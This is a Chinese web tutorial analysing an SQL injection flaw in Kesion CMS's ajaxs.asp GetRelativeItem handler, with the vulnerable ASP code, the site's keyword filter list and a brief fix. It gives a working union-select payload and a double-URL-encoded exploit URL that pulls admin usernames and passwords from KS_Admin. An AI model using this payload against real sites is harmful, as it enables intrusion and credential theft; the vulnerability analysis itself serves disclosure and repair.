当前位置:首页 > CMS教程 > 其它CMS > 列表

Kesion cms sql注入漏洞修复及其分析

发布:smiling 来源: PHP粉丝网  添加日期:2015-03-24 14:17:16 浏览: 评论:0 

文章介绍了desion cms容易被sql注入的修复方法,方法为UnEscape()函数调用位置放在函数体内,或者不调用.

先我们来看代码:

  1. Dim KS:Set KS=New PublicCls 
  2. Dim Action 
  3. Action=KS.S("Action"
  4. Select Case Action 
  5. Case "Ctoe" CtoE 
  6. Case "GetTags" GetTags 
  7. Case "GetRelativeItem" GetRelativeItem //问题函数 
  8. ...skip... 
  9. Case "getonlinelist" getonlinelist 
  10. End Select 
  11. Sub GetRelativeItem() //漏洞函数开始 
  12. Dim Key:Key=UnEscape(KS.S("Key"))//漏洞位置,只调用ks.s函数,无其它过滤。 
  13. Dim Rtitle:rtitle=lcase(KS.G("rtitle")) 
  14. Dim RKey:Rkey=lcase(KS.G("Rkey")) 
  15. Dim ChannelID:ChannelID=KS.ChkClng(KS.S("Channelid")) 
  16. Dim ID:ID=KS.ChkClng(KS.G("ID")) 
  17. Dim Param,RS,SQL,k,SqlStr 
  18. If Key<>"" Then 
  19. If (Rtitle="true" Or RKey="true") Then 
  20. If Rtitle="true" Then 
  21. param=Param & " title like '%" & key & "%'"//类似搜索型注入漏洞。 
  22. end if 
  23. If Rkey="true" Then 
  24. If Param="" Then 
  25. Param=Param & " keywords like '%" & key & "%'" 
  26. Else 
  27. Param=Param & " or keywords like '%" & key & "%'" 
  28. End If 
  29. End If 
  30. Else 
  31. Param=Param & " keywords like '%" & key & "%'" 
  32. End If 
  33. End If 
  34. If Param<>"" Then 
  35. Param=" where InfoID<>" & id & " and (" & param & ")" 
  36. else 
  37. Param=" where InfoID<>" & id 
  38. end if 
  39. If ChannelID<>0 Then Param=Param & " and ChannelID=" & ChannelID//开源软件:phpfensi.com 
  40. Param=Param & " and verific=1" 
  41. SqlStr="Select top 30 ChannelID,InfoID,Title From KS_ItemInfo " & Param & " order by id desc" //查询  
  42. Set RS=Server.CreateObject("ADODB.RECORDSET"
  43. RS.Open SqlStr,conn,1,1 
  44. If Not RS.Eof Then 
  45. SQL=RS.GetRows(-1) 
  46. End If 
  47. RS.Close 

如果配合Unescape()函数,刚过滤不会生效,可以采用unicode编码方式,则不会在浏览器中出现被过滤的字符,例如,单引号可以编码为,%2527,经过解码后还是“'”号,这样的话,就可以利用类似php的二次编码漏洞的方式绕过过滤了.

注入语句:%') union select 1,2,username+'|'+ password from KS_Admin

转换如下:

  1. /plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 

先进行了过滤,然后才调用UnEscape解码,代码如下:

  1. Public Function S(Str) 
  2. S = DelSql(Replace(Replace(Request(Str), "'"""), """""")) 
  3. Function DelSql(Str) 
  4. Dim SplitSqlStr,SplitSqlArr,I 
  5. SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell" 
  6. SplitSqlArr = Split(SplitSqlStr,"|"
  7. For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr) 
  8. If Instr(LCase(Str),SplitSqlArr(I))>0 Then 
  9. Die "<script>alert('系统警告!nn1、您提交的数据有恶意字符" & SplitSqlArr(I) &";n2、您的数据已经被记录;n3、您的IP:"&GetIP&";n4、操作日期:"&Now&";n Powered By Kesion.Com!');window.close();</script>" 
  10. End if 
  11. Next 
  12. DelSql = Str 
  13. End Function 

这样我们还是开头的那句话使用unescape()函数或者不使用本函数.

Tags: Kesion漏洞 sql注入漏洞

分享到: